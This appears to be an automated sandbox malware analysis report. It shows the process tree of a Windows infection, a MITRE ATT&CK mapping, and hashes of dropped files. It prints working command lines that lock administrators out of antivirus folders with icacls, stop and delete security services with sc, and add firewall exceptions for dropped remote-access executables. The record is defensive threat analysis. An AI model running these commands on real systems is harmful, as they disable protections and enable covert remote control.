    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:920
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1668
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:1824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  - Executes dropped EXE
  PID:2224
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:2688
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:608

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2068

C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
1⤵
- Launches sc.exe
PID:1952

C:\Windows\SysWOW64\sc.exe
sc delete swprv
1⤵
- Launches sc.exe
PID:3000

C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
1⤵
- Launches sc.exe
PID:2652

C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
1⤵
- Launches sc.exe
PID:2464

C:\Windows\SysWOW64\sc.exe
sc delete AdobeFlashPlayer
1⤵
- Launches sc.exe
PID:2784

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1724
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2324
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    PID:1452
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:1124

C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMysql
1⤵
- Launches sc.exe
PID:1876

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:2608

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1320019529908143096-1011888767-1211120489-725225972229479731-1070977975541180498"
1⤵
PID:936

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15307511822073388608467562640197776524513850794259419055108811310181884484709"
1⤵
PID:1324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1759484602335302855-320950253-954219912-187426530194183497-1943095031782705454"
1⤵
PID:2064

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1981159676-14517695741321048560-351219975-746238675-1972370020749253531107725543"
1⤵
PID:2912

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "99790864220664105911036055958-118135464611361959491377243471-1562477666-1618672931"
1⤵
PID:1748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-834492957-1495983628-94468391-151339791810271411421321460048-2029158642-416727629"
1⤵
- Executes dropped EXE
PID:1592

C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
1⤵
PID:1292

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1557967186-628462039-17880891769788261184609054177183384131277642348-1431610370"
1⤵
PID:1568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17569199671492895355-1762712817-7407549819869549911808915361630457072158957541"
1⤵
PID:3048

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-761520459596091433-2013031180-1283888860379004871867199882-1870381191-2098359619"
1⤵
PID:2456

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1936041988522703646-9009659341010537380938810200750924031-1297195581326504027"
1⤵
PID:3000

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-369446401800307528-3655945811130040482-290295440-302326359-19003977661537513751"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Intel\P.exe

Filesize
64KB

MD5
b52f68b65fcfbbccf02f870660f3dd28

SHA1
e702ed5b0b6d0ecfd8acecc0e7fbad724fd74319

SHA256
2220521c6146b820374cca171f18d120a5734ea4dc94178c0d51a821df286b89

SHA512
efc62507cf18126af89c82c6cb7b7a9090c48d8216c4c7404bfbb6b20c70344395f9f3b0c99a4c85270fc8cf2b88a2c2207537069724ac5673b2f53125ceef84

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe

Filesize
887KB

MD5
ad95d98c04a3c080df33ed75ad38870f

SHA1
abbb43f7b7c86d7917d4582e47245a40ca3f33c0

SHA256
40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

SHA512
964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
2KB

MD5
d8f14500d0083f3cedb17ab9bd07bdbe

SHA1
2bbefddeacbf70475f4a21176c831df9cf259334

SHA256
4e438391f71b094061b5367ef9050e30035ee831d243c29abd3b879943c7bf67

SHA512
0dbee7f740e42bec667c5293b9b7620765f4e378c077979528f5e4b22ceacf3ad3c703eca15500bb9915374b6368f28acc3fa76fda9ad86bb8693c0ef64ded5d

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Filesize
4.5MB

MD5
f9a9b17c831721033458d59bf69f45b6

SHA1
472313a8a15aca343cf669cfc61a9ae65279e06b

SHA256
9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce

SHA512
653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

Download Submit
C:\ProgramData\Microsoft\Intel\winlog.exe

Filesize
244KB

MD5
4b2dbc48d42245ef50b975a7831e071c

SHA1
3aab9b62004f14171d1f018cf74d2a804d74ef80

SHA256
54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724

SHA512
f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd

Download Submit
C:\ProgramData\WindowsTask\winlogon.exe

Filesize
381KB

MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\ProgramData\Windows\install.vbs

Filesize
140B

MD5
5e36713ab310d29f2bdd1c93f2f0cad2

SHA1
7e768cca6bce132e4e9132e8a00a1786e6351178

SHA256
cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

SHA512
8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

Download Submit
C:\ProgramData\Windows\reg1.reg

Filesize
12KB

MD5
806734f8bff06b21e470515e314cfa0d

SHA1
d4ef2552f6e04620f7f3d05f156c64888c9c97ee

SHA256
7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544

SHA512
007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

Download Submit
C:\ProgramData\Windows\reg2.reg

Filesize
1KB

MD5
6a5d2192b8ad9e96a2736c8b0bdbd06e

SHA1
235a78495192fc33f13af3710d0fe44e86a771c9

SHA256
4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

SHA512
411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
448KB

MD5
ef05393569686d8953017e97f0456553

SHA1
2b331e32a02e4d10d8055ed9829d3ab58152f908

SHA256
9e384630f5a2f8c625a577cf7eb1bb136b505f4b4a976736a7785b563fda0967

SHA512
aa13b114748ba5caee1a72fb10f35f06183e798f8148167989b6fe9b35e7db484260ee958301d1e6eda7aeed0b9bfc67e3aa73c3cd0842c9a9d898b6635c2d47

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
256KB

MD5
5b85539d822f240c0ecb7a26ad98823d

SHA1
cdb3d20df359143f07f15307f4fbd4246f8cdea1

SHA256
b91ae58d8ebbd9a65ca460e9efe813f11c61c9c574b617f470a642f4c3cd369b

SHA512
13ffde9269ed033e2ff4502339d22f1a5f8aa6d9e50c00c70ff9c6a4859c3d27eea737deee46437c92a2768178d40d6ab70913c0d34249bdc5cc48e79ca1444d

Download Submit
C:\ProgramData\Windows\rfusclient.exe

Filesize
128KB

MD5
f7649029d2f537e0f5128b9253755dd3

SHA1
30d111f343fca71dc12306cf1d2edcea2624689d

SHA256
34ad6f3315957cbd11ea3c6ad930d5819be469578b46cfc758fa780a8b75408e

SHA512
9e08718011466452384df6a9c2d687a9c6a462d4d0cf7fe44f51830c635ec735c36ee450b0541b0088b771ff747d469ccfe5bd2870feb68f95c6c6c339be03a8

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.2MB

MD5
dce53fb37730a7cb1c0b6a1b664fef00

SHA1
33bc151511b6391533089609830fe67b426c10e6

SHA256
c447bd668d4cf03efe3343e9c37a94423027cb5da8deb8ae3f05964f43fe9803

SHA512
c14f5b9cea5c392db4b205e06705f917a2b8039ec994fee14cd2266d79af9b4badc89145345bc147c4658c9cf6b201f27d7514b6f5b35ce315d0c32a09246111

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.0MB

MD5
fc9be865e1ca5fd68c14c8ed32638ae4

SHA1
502a48ac912c6d8b84cf5e4412189ef6827a50b4

SHA256
a23aadae9c376d13bd0a8ec05e481986ae0f579a631f67b97d120a313658ad8c

SHA512
c01d474d9b14a533e85b509c33585b41c095594ed8d8a8b820badf62a62951891dbd770588d3321078d124e52428dbd60ded39291e3eb23447c4bb9728788474

Download Submit
C:\ProgramData\Windows\rutserv.exe

Filesize
1.6MB

MD5
16e42271adf107bba75b0cbe13fb8459

SHA1
ce332afb9670499d400ed02f9ad17a9c4cb2cda1

SHA256
bdb3fa4abd5343220b7566be3d8453f1141cab9fb91ddf64b8614732f43d86d2

SHA512
017c1450cba848331b016625f1e4131a8b66860ac857184f7b119bfb2070de71b7a4db0fc3ad2bf9aedb94d457b043bcc199969a90a7037fb939f0e7f434dfd4

Download Submit
C:\ProgramData\Windows\vp8decoder.dll

Filesize
155KB

MD5
88318158527985702f61d169434a4940

SHA1
3cc751ba256b5727eb0713aad6f554ff1e7bca57

SHA256
4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

SHA512
5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

Download Submit
C:\ProgramData\Windows\vp8encoder.dll

Filesize
593KB

MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
320KB

MD5
6e8041f95c8eac680c1fa9bcab3c0bcf

SHA1
158a68563d21ae6f9d465f0ac66eb3263b0a0b7c

SHA256
b33e29f51e39a6ccd5a969c18a2cfb17b1b8936347cd8ef8b72f2aff6d179734

SHA512
39121c469640f201d05b3dcc2c90da4acd0bbb7522acc665306e6c09e39b73a7180ebe970185a31f8fe910df8aa464362441e91e5efa1ffadc326b98cc356150

Download Submit
C:\ProgramData\install\cheat.exe

Filesize
1.4MB

MD5
b44b6245b1758935130651d3c6940fec

SHA1
f20213063342ec9579b029769979fc3405e613ef

SHA256
0634ee20b8a25b758fb5f960d02addb81b761c0f254503def93e59aa7081bdd1

SHA512
f02d1f52ce6f5421c5264db9e32d0ca9c682230db52da9af6abb7bdcc1712d041bdd80837a07afef4701bd4d13f92361cce8a27a8b2b41dc4d3eb7fb91a1e775

Download Submit
C:\ProgramData\install\ink.exe

Filesize
112KB

MD5
ef3839826ed36f3a534d1d099665b909

SHA1
8afbee7836c8faf65da67a9d6dd901d44a8c55ca

SHA256
136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040

SHA512
040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

Download Submit
C:\ProgramData\install\ink.exe

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\ProgramData\microsoft\Temp\5.xml

Filesize
23KB

MD5
487497f0faaccbf26056d9470eb3eced

SHA1
e1be3341f60cfed1521a2cabc5d04c1feae61707

SHA256
9a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5

SHA512
3c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd

Download Submit
C:\Programdata\RealtekHD\taskhostw.exe

Filesize
2.0MB

MD5
639a6e9e1949265f493c1a3505bc3430

SHA1
416384c79557c0a2d1e56e9449ac04d71c9f3477

SHA256
a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd

SHA512
57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7

Download Submit
C:\Programdata\Windows\install.bat

Filesize
418B

MD5
db76c882184e8d2bac56865c8e88f8fd

SHA1
fc6324751da75b665f82a3ad0dcc36bf4b91dfac

SHA256
e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a

SHA512
da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

Download Submit
C:\Users\Admin\AppData\Local\Temp\C774.tmp\C775.bat

Filesize
139B

MD5
cfc53d3f9b3716accf268c899f1b0ecb

SHA1
75b9ae89be46a54ed2606de8d328f81173180b2c

SHA256
f293caa096cc51a511cedd76fd011a275fb8a30b6a93542ded718930a7d12ee9

SHA512
0c090e2ed2f3f7b2c00cbb6583df5723a3d0781738eafc37b2e630f46b5b470a5a7dbc44a2f2e8d043f83c753ddf5f72b1d67c0a7e73241e47cd24c92b4ce7d4

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
ea3152149600326656e1f74ed207df9e

SHA1
361f17db9603f8d05948d633fd79271e0d780017

SHA256
f895f54a7397294132ebe13da0cf48f00028f5ccc81eac77eecafdec858e7816

SHA512
5f79b3295a6a2c4b5c5720e26741ae5da2008165bcde01472e19362f7ffd4edabaea348bb99c2850871045cfb07fb0e51e6c3db7b2e278732a9f15f5b34f1a52

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
1KB

MD5
9f3326961b12fa03df0329b6697edbe9

SHA1
e2dd54dc19b3246c7676fb2e6a3c8572e05db13f

SHA256
b3292f396402f6e0019c8f01cf9bbda5a8282689f59c93bce1f32256dd6a8c35

SHA512
fe6d41e4ae942ddadc04cdfeea5306ed8deefad100bd4adf900a71554a96942a501ff7c77e646a9e4c24a5feda5771347a9905db9795b40c59f0ac9fe756a69b

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
1KB

MD5
b6524af85fccca7924724bae237a8c97

SHA1
aa7a47c1d2c817cdb7e0a4c85ca8ebda21643323

SHA256
44c90dc303e3403bd84d843dd9e02f2c2a5bb79549e2de3908bdfe459b4cc0fc

SHA512
d36b891f4b089751e88268c30169e68dcce1a6f1d739a39aa3d0d1d443414516ecd51dd5837025958c858d7440be29af91709cbad8ee63c80937b48710eba3c0

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
1KB

MD5
edac196c04217a6f32fe85dffc5d6982

SHA1
bbd8f1bc2e3c4de16a796ff8d35d50a3f6f902bc

SHA256
fc30e615ca5d7273ae627d3a8aa67ead65e6563d78755925b017db668269f7d6

SHA512
2e3f47c54eb236a870cae2e7c813bde49797715d4f7031aedc2891611aac4b0d45fd2145fcf0a7befde268a54eb758badac4cafab699c72c13235bfa9bc50b13

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
1KB

MD5
e2250bfa755fdfe06b0a02a6e1cd2151

SHA1
bd77241f73c19a1fae4d289bf0e8061b9247899d

SHA256
5ed10ce76f3b1be532d2e3fc2d3bada69949226e209e8b18270def9b1646a7ad

SHA512
0a2ac5ea53fd8a1c8bb16ab03ada2bf1bb7a95820c45378f304ef8bae20ac33d71fa91f83127caeb88712ca559f488ad821dd30c28eec6e48bbac1e6684c63c3

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
13e138397d5641b28fa3740fd2355ee5

SHA1
0e45ccfb10db400fa17ef613e914437aac9534cd

SHA256
c8a87cd08377598df1bda221a9a9fefee6b5c605a5c65482413025b6f9a2319a

SHA512
c22b013885cef0a2faaaed785cf05bb9a37dfd6bca01cf685fda519666a636e68ef4973cc35cf57772e7655905f78051b10d2849c2eb2598f9cb9eb1c0892790

Download Submit
C:\programdata\install\cheat.exe

Filesize
2.5MB

MD5
9f92d1fd638226461cf0b95de4bb6cf1

SHA1
cb1837e0eeb4f5a87eec12aed6120fee33f810e4

SHA256
b647c3b76aca8fa197368661044d9de55d159469711b75c3bcba080e2b7689cf

SHA512
b5a4035af68d27a9464e9c3ccc0f30663246dce16de900cd64112a4ff47d07d043a5b542f9c5bd0a744cede5292b0542b41eedb357bc71b3afc4ca1559222450

Download Submit
C:\programdata\microsoft\intel\P.exe

Filesize
382KB

MD5
b78c384bff4c80a590f048050621fe87

SHA1
f006f71b0228b99917746001bc201dbfd9603c38

SHA256
8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b

SHA512
479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab

Download Submit
C:\programdata\microsoft\intel\R8.exe

Filesize
64KB

MD5
9cc2d91e506480c6c1b0cab521c3a33d

SHA1
22326076123f69ae6f56bea75476b8ceda2c2639

SHA256
42d55d920622feb365255a2504f85ff640574ab0280cb5534f289c7c76b10c9c

SHA512
b89a50c630bc884e455ed7dcda93e52622142d5ae39948516065bc1a99e93b288b25449246a78997a0c6eaed8e1745bfcdb46dde1cd3b80b6bce8459ea37f659

Download Submit
C:\programdata\microsoft\temp\H.bat

Filesize
5KB

MD5
76303bb3bb0faa707000df998d8c9f3d

SHA1
5b25444c92c7625e1ca77ed2eb1b4ba6877ba066

SHA256
a33af2b70ad8fea8900b6bd31ac7b0aab8a2b8b79e3e27adafbd34bdfcb67549

SHA512
25e34a1c1507d96e3a9a9722370ee98c85c900329ea74054783cd486a384f088bfe49e6662aa7eb3fc6db58a0178eb8a8851e13b608831bdd828830b8fdf981c

Download Submit
C:\programdata\microsoft\temp\Temp.bat

Filesize
463B

MD5
9380f21201174ac1267aa944e1096955

SHA1
e97bd59509694d057daaf698a933092f804fe2e3

SHA256
ccf47d036ccfe0c8d0fe2854d14ca21d99be5fa11d0fbb16edcc1d6c10de3512

SHA512
ff4d2172c75a90b1af183fddc483d7a6d908593cb47009f37818066dee021bf7172b8890502fb26d248d39479c6276dce120b570e31f43fcc616db4b43c67e27

Download Submit
C:\rdp\pause.bat

Filesize
352B

MD5
a47b870196f7f1864ef7aa5779c54042

SHA1
dcb71b3e543cbd130a9ec47d4f847899d929b3d2

SHA256
46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba

SHA512
b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

Download Submit
C:\rdp\run.vbs

Filesize
84B

MD5
6a5f5a48072a1adae96d2bd88848dcff

SHA1
b381fa864db6c521cbf1133a68acf1db4baa7005

SHA256
c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe

SHA512
d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

Download Submit
\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
1.6MB

MD5
75bafdfe3e09da5089d8b48246fe53f8

SHA1
91109d30cf48013abf7109a7d8a32926bc4a1173

SHA256
c59b2297a384b8c617e3cfcf597a5cd6c309ac0bb43973365ec5e357567b196d

SHA512
d8fa4982fc1659d97ac8b84865e7170032f7dc844585b052e527e89907631b8ac45ca986e4226fc378713cf0dc0f988f4132340b78fe73edfdbae3e1e65bb1a5

Download Submit
\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
1.5MB

MD5
4d750be1ff8fbc66d171521dcb849aa3

SHA1
0f1fc8463d09e1d55c9695193641cbb2eb941759

SHA256
b9a4c3e20f2e66da0e36771ed524596819f6ff5710459fcdfab0b0d8815ada8e

SHA512
e7ef30841823ac6a22213beb7e0a10e5be934c7e47933160e8fa377bce68e4eddc2d686fa7bac1b970fc2fdfcfc55275abfa6109057781682bd5a650afbe9393

Download Submit
\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
1.7MB

MD5
abdda3999fe14d2ee1af22cc8ed84e39

SHA1
2549173a71a617dc95aaeb1546e34831b7a8d99e

SHA256
481f580417ed373b72e577c286506dc56fa2e076661946901ab27864a45a21f7

SHA512
63bb2a4915ed0cad3c31fd8c30bac2757b6b27b30e207d3949edb0d1e5d635203050ef538c5f975b379c93e0bba511d57bfae1e74c501233244f378901e3c198

Download Submit
\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
1.6MB

MD5
753f2c8714b9eeae42da0146cd517b43

SHA1
f69e0e0c80824a030c1e98ce67c6c8d02595bab9

SHA256
79bbdc448b946b015bee360df83fafa8f7891f15ac40b65002f61a063712ebfe

SHA512
3a3d35667d6d257c05cf2f66a54ef51cb2c49f0b308634bc71faed2729bf617d1979f6a36f347415a914f0626d6a27f0178f1695b82bef8bdad45b9609f40a9c

Download Submit
\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
\ProgramData\RealtekHD\taskhostw.exe

Filesize
704KB

MD5
e5b7756472b90e903fcfb0446efbe25c

SHA1
ab8f548d1de780ae2a0dd4fe4d65daa60541dcff

SHA256
494f0e93b6788ae732d9d633324b47fbd1e1817d328ab35fd20e78f5ca53979b

SHA512
6488aa5b5210ef6020033d49716fbc1ecf835ba82f8cf35a1d5970e5fb9725a2066f74fe09242f8994e0aa0bbb78fb5043e734be72c263e768fcee0cc340142e

Download Submit
\ProgramData\Windows\rfusclient.exe

Filesize
384KB

MD5
699ddb9823628c0e2ea04965725e166f

SHA1
a4998ca5e9bade04ef447157014598e905e19f81

SHA256
b96718c6a86f4aa12ef9e754869f079c1c531c1be2bed345237f9b6033e33756

SHA512
6e1eb46a1246e80f55c1b4f809b0e6654e0831e8de2d77f05d5b87ba7f6080a031eca6e612ef62b57086ddb512d652c19c71782767f061b0db3fea1eb6b995e0

Download Submit
\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
\ProgramData\Windows\winit.exe

Filesize
642KB

MD5
9d7e39523f83349f866ceaff7e65dfef

SHA1
2150dd7c8dd8b8aeddd0bbac1211df8b88a77f96

SHA256
6a64ca0ca02d2e794c6413ae1fd986cf1f3971bc80dbf5a840cf7f116d3f2bbd

SHA512
81c2e01eb8c3ad48a72d9866553e3495299ba8c5f8cdc97c30304c1afc8ba52a7df7331aa53997e021b8005a72a52003dff0a85ec00c3615142e0ee34d5aa208

Download Submit
\ProgramData\Windows\winit.exe

Filesize
576KB

MD5
4f198ea0c3c56bdaa5d9cb11314ed23c

SHA1
93d61427180288b85770624643c95e9715dcf0bd

SHA256
48e1c3f4dcb1b3c32e6ff69f78333fca6867bc8f53eface7f25f693d5f032153

SHA512
2c098f4dbcca08e96dd536b482b6fca5fe6ec4735de5a845f975638b34f9a8a23c81b857bb024720f7fd08a3a76ccb6d0556c308128f00b91fdbf896ddc28528

Download Submit
\ProgramData\Windows\winit.exe

Filesize
594KB

MD5
